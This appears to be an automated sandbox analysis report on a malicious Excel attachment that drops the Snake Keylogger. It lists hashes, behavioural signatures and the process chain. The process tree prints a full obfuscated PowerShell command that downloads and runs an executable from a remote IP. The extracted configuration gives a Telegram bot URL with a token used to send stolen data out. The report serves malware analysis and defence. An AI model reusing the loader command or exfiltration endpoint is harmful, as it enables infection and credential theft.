Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-10-2024 11:30
Static task
static1
Behavioral task
behavioral1
Sample
SUNLIGHT UPDATED ORDER.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
SUNLIGHT UPDATED ORDER.xls
Resource
win10v2004-20241007-en
General
-
Target
SUNLIGHT UPDATED ORDER.xls
-
Size
848KB
-
MD5
5a232e6f517ecc2663439fcf2a28573d
-
SHA1
155a24515072423a751465a774fc6e3e24e21f84
-
SHA256
4af00aaa090c79876c7d3c1c337cdb5244f0b05689de4e22b7ed4a84bb8eb9d8
-
SHA512
a96e1d03f6155e30e236d4234c0c352911d3780cd59493ea8545296dc8b42c2befed3972adfbf0001df24023e522547d00bb2de68c27d729cf689487ad5b4f49
-
SSDEEP
12288:YmzHJE+CzldQD3DERnLRmF8D5JhuiC3LaQlOh4cjUVwUi4t7W:zczlWbARM8NTC3eQ0h4eU
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot8129252196:AAFb_vUYwennKVolbwpXf3vnDfT_yhozHns/sendMessage?chat_id=7004340450
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/1664-69-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1664-70-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1664-71-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 3 IoCs
flow pid Process 10 2860 mshta.exe 11 2860 mshta.exe 13 2132 pOWeRSHEll.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 1312 powershell.exe 2132 pOWeRSHEll.exe -
Executes dropped EXE 1 IoCs
pid Process 1644 wlanext.exe -
Loads dropped DLL 1 IoCs
pid Process 2132 pOWeRSHEll.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000f000000018683-61.dat autoit_exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk pOWeRSHEll.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1644 set thread context of 1664 1644 wlanext.exe 39 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wlanext.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOWeRSHEll.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1304 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2132 pOWeRSHEll.exe 1312 powershell.exe 2132 pOWeRSHEll.exe 2132 pOWeRSHEll.exe 1664 RegSvcs.exe 1664 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1644 wlanext.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2132 pOWeRSHEll.exe Token: SeDebugPrivilege 1312 powershell.exe Token: SeDebugPrivilege 1664 RegSvcs.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1644 wlanext.exe 1644 wlanext.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1644 wlanext.exe 1644 wlanext.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1304 EXCEL.EXE 1304 EXCEL.EXE 1304 EXCEL.EXE 1304 EXCEL.EXE 1304 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2860 wrote to memory of 2132 2860 mshta.exe 32 PID 2860 wrote to memory of 2132 2860 mshta.exe 32 PID 2860 wrote to memory of 2132 2860 mshta.exe 32 PID 2860 wrote to memory of 2132 2860 mshta.exe 32 PID 2132 wrote to memory of 1312 2132 pOWeRSHEll.exe 34 PID 2132 wrote to memory of 1312 2132 pOWeRSHEll.exe 34 PID 2132 wrote to memory of 1312 2132 pOWeRSHEll.exe 34 PID 2132 wrote to memory of 1312 2132 pOWeRSHEll.exe 34 PID 2132 wrote to memory of 1700 2132 pOWeRSHEll.exe 35 PID 2132 wrote to memory of 1700 2132 pOWeRSHEll.exe 35 PID 2132 wrote to memory of 1700 2132 pOWeRSHEll.exe 35 PID 2132 wrote to memory of 1700 2132 pOWeRSHEll.exe 35 PID 1700 wrote to memory of 1248 1700 csc.exe 36 PID 1700 wrote to memory of 1248 1700 csc.exe 36 PID 1700 wrote to memory of 1248 1700 csc.exe 36 PID 1700 wrote to memory of 1248 1700 csc.exe 36 PID 2132 wrote to memory of 1644 2132 pOWeRSHEll.exe 38 PID 2132 wrote to memory of 1644 2132 pOWeRSHEll.exe 38 PID 2132 wrote to memory of 1644 2132 pOWeRSHEll.exe 38 PID 2132 wrote to memory of 1644 2132 pOWeRSHEll.exe 38 PID 1644 wrote to memory of 1664 1644 wlanext.exe 39 PID 1644 wrote to memory of 1664 1644 wlanext.exe 39 PID 1644 wrote to memory of 1664 1644 wlanext.exe 39 PID 1644 wrote to memory of 1664 1644 wlanext.exe 39 PID 1644 wrote to memory of 1664 1644 wlanext.exe 39 PID 1644 wrote to memory of 1664 1644 wlanext.exe 39 PID 1644 wrote to memory of 1664 1644 wlanext.exe 39 PID 1644 wrote to memory of 1664 1644 wlanext.exe 39 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\SUNLIGHT UPDATED ORDER.xls"1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1304
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\SysWOW64\WINDowsPOweRShEll\V1.0\pOWeRSHEll.exe"C:\Windows\systEm32\WINDowsPOweRShEll\V1.0\pOWeRSHEll.exe" "poweRshELl.ExE -Ex ByPass -nOp -w 1 -c DEVICEcrEdeNTiALdEpLOymENt ; IEx($(IeX('[sysTEM.TExT.eNcODiNG]'+[CHAr]58+[cHAr]58+'utf8.GEtStrIng([sYStEM.CONVert]'+[cHaR]58+[ChAR]58+'FRoMBASE64stRiNG('+[chaR]0X22+'JHpWV21LICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlZklOaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNb04uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVJdEd0RkxyayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHlPaGNCWkMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnRFl3bFBXUURDLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHp1UyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFV3Z05LQ3FQWk8pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQ3RhaHNQek92IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU0hrSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHpWV21LOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNDUvNTYxL3dsYW5leHQuZXhlIiwiJEVuVjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3N0QVJ0LVNsRWVQKDMpO3NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[chAR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -nOp -w 1 -c DEVICEcrEdeNTiALdEpLOymENt3⤵
- Evasion via Device Credential Deployment
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f8unps7y.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9EEF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9EEE.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:1248
-
-
-
C:\Users\Admin\AppData\Roaming\wlanext.exe"C:\Users\Admin\AppData\Roaming\wlanext.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\wlanext.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1664
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD567e486b2f148a3fca863728242b6273e
SHA1452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD5e5bc4484bff0bfb4b9bd5391186b6c4e
SHA160ca6f4f60953660b32ff3d796dc9f3832ecb562
SHA256b9bac085904f311fe5d1b5a43994ee4cefab1838de8f67b80c7a0a307ff57b92
SHA512f60462660a573921c78440edab501400acc77b452bbbaf2994ada96eb129422750365a54ba205017c98a9317c2ecad2c2f4db5f670596d5b3437004882215400
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD53d1cfe48cec2413f40659ab3fb372aec
SHA1080d21b4b8a0e4e51889a1981776450d8319962c
SHA25614e4fc48da7863237002ce19eb4ccb44a407a85e6cc82d04fc5f6491e342325d
SHA512dc3dda328d989a166e00f22e9d4690cbe1ef509093307edfb98c39d9b4c550c73372c4cb04009d2f4662e3a7c55371ec3889b67ef2e6cebe956e0a175f791ef4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\seethemagicalpersoninmylifewithherlifegoodforme[1].hta
Filesize8KB
MD524dcf722096ca6d02bbb70733ae01abc
SHA1fb8166a57aaf6d4837dfb686b84ee51474941c83
SHA256e0d07f596090db80fff8fb48b11999010611ac352534fadcf295c7ac47042bdd
SHA512bb055ad22ba25be389d212fe6517b28244234d259cb0dc870eb7691b6ac3f99ed1d3a8408552f3f1fed9d29313a4a14d5a3fc3c08c629790990a8229f8ab33da
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5b15eb5415f82363d1d3b50c2eb4a61b4
SHA1b351610499aa07874cfd690bca17c30eef0c7d60
SHA256c02d8b60b722dc3638b43a85cb216101873e425461fda6ab0e5e3971912fc8c8
SHA512fbea161eab32b60f7e44f8ba59011ff77638e2952b940a5058b15e2ada16c5d5f18618059964b2d75e3f7b21c3a1e3c4aef2fb32f93f30ccf3b0083197adcd2f
-
Filesize
3KB
MD57579765413e130c3f018eec692fe137d
SHA13c1269207ed899c3217026af66ab8999d68a8aad
SHA256ab6ba5ffbcf9060f1c54f14ed8d0db9c4b17f9e173738f3ae58df62abfee295a
SHA512c582abc11eb5061dbed73742b1d9f509e172be9f1c2d6a43ecca485796102709e0ece1871a36e43c963fa782916e29258c9421432e778f479a03302fcd06ccf8
-
Filesize
7KB
MD5053b45df439104dc478a59c2026a575e
SHA13ebb962e1cc29f081ff23916580886fba9daef86
SHA2569c75ec32fc030aef6ec27b5280ae8a81b5e83d49d8752fe8cf301a55ff6a299b
SHA5127b5224cbeb326587ca5cd776ff97e6c3661dd82c5aaf3f1ea29c29c4b33befa51fc97d8c98d78013c8d131e246e0f3cfc9f36f7ffb75ba435f5a8b7326bf7f29
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5d1cfed62005fc46af94969453b66912d
SHA174f4f9dfab5d2f17247f707577d0935f7ee445d1
SHA256c91bdbee4e102d17835ae5f7024d6331926fab3c4917002fa89142dba048d24c
SHA5126a9e0023ede076c4ee5b6c8a94598214e39ede97ede46ca5be46371150229e00b685f9fd2d068b73a84a38568a962d34e0f4ec3f3ac8b82b55ff16f34c012bc7
-
Filesize
928KB
MD5ed7a5494d8b8fcb1044999a61e436ed7
SHA18295350be915d24bd3701e5b0ad9711dfc2f2f86
SHA256644357875a1b10ed205cf41b3dd8fe4f9f78be54b8dd07642e0648dd67177819
SHA512c138d6ee662be1fab2cd9b8418e3419414205797e1dd82a0b8a1455cfb0f23a6720cd686600049d8eb557b483b806e587693b22f3755e1e00f311d48cd968a33
-
Filesize
652B
MD5cdda0e24f813ff263577ae532e3037da
SHA1ce9a7d67cf85c21927cdf368f721eb766fbef802
SHA2565ed835b908e0026a5b548f849da1de445d720064bedbcb7063c17b8325e7fabd
SHA51248da537af6c4c12a5748555939de1f8949f024dd13f0fa5f9543b25e73b3fa2420c551b363d6bc8ca5601fd6c7e6d4d0552f1885afb6288b1e3c256fc8c53e92
-
Filesize
483B
MD54c5d6a51b5bad9b89090a128b2676ef5
SHA113fbf9031d31d7c621c9fa9816818b341377d487
SHA256c849809f9d06a8ef3bbd4de89bc706fbd851231f8dfe9f8ed84800c9b67e80d7
SHA512a3f1573cee336b8efe076e8746e5a61e73d46b539cb5170f297262a5327e7b43e0c45cfe93682e93b92f20e878ae9e21e60502dbcdf492236ea642f15290601d
-
Filesize
309B
MD55cea53cf40b8dc7ff75968eeb58f62d8
SHA1afd701f26af73206c983bab16a38a554834b46a8
SHA25661d30c37e811ea79a0c810c0ea275225f9ea123ef20ea19be00082a3fabfec72
SHA5123a9aee8ec1db79be47971b8c2a80bbcdf914f16fae1f6803fd5e891a279b8014d36085096f36a25ebdf451d1e457292b96b5ba47ea325072ad869a8f4d53466d